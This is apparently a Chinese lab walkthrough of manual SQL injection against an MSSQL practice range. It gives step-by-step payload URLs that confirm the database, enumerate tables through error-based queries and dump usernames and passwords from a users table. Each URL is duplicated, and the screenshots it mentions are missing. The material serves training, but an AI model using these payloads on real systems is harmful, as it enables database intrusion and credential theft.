MSSQLILABS靶场手工注入

一.判断注入点

注入点为1'，如下图所示，可知数据类型为字符型

 二.判断是否为MSSQL数据库（可利用报错来看）

判断报错

判断正确

http://172.16.1.34/less-1.asp?id=-1' and exists(select *from sysobject)--+http://172.16.1.34/less-1.asp?id=-1' and exists(select *from sysobject)--+

三.：查询数据库信息，user回显的dbo表示是最⾼权限，如果是⽤户的名字表示是普通权限

 查出用户与数据库名http://172.16.1.34/less-1.asp?id=-1%27%20union%20select%201,user,db_name()--+http://172.16.1.34/less-1.asp?id=-1%27%20union%20select%201,user,db_name()--+

四. 通过以下语句来猜解有哪些表...从⽽获取⽬标站点的表信息...

第一张表

http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' )--+http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' )--+

第二张表

http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users')--+http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users')--+

第三张表

http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails')-- +http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails')-- +

第四张表

http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents')--+http://?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents')--+

 第五张表返回值为空，说明只有四张表

五.爆出user表里信息

通过以下语句爆出

having 1=1 --+

'having 1=1- 'group by 字段名 1--+

having 1=1- 'group by 字段名 1 ，字段名 2--+

 

 

六.爆出字段值

http://172.16.1.34/less-1.asp?id=-1%27%20union%20all%20select%201,username%20,%20password%20from%20users--+http://172.16.1.34/less-1.asp?id=-1%27%20union%20all%20select%201,username%20,%20password%20from%20users--+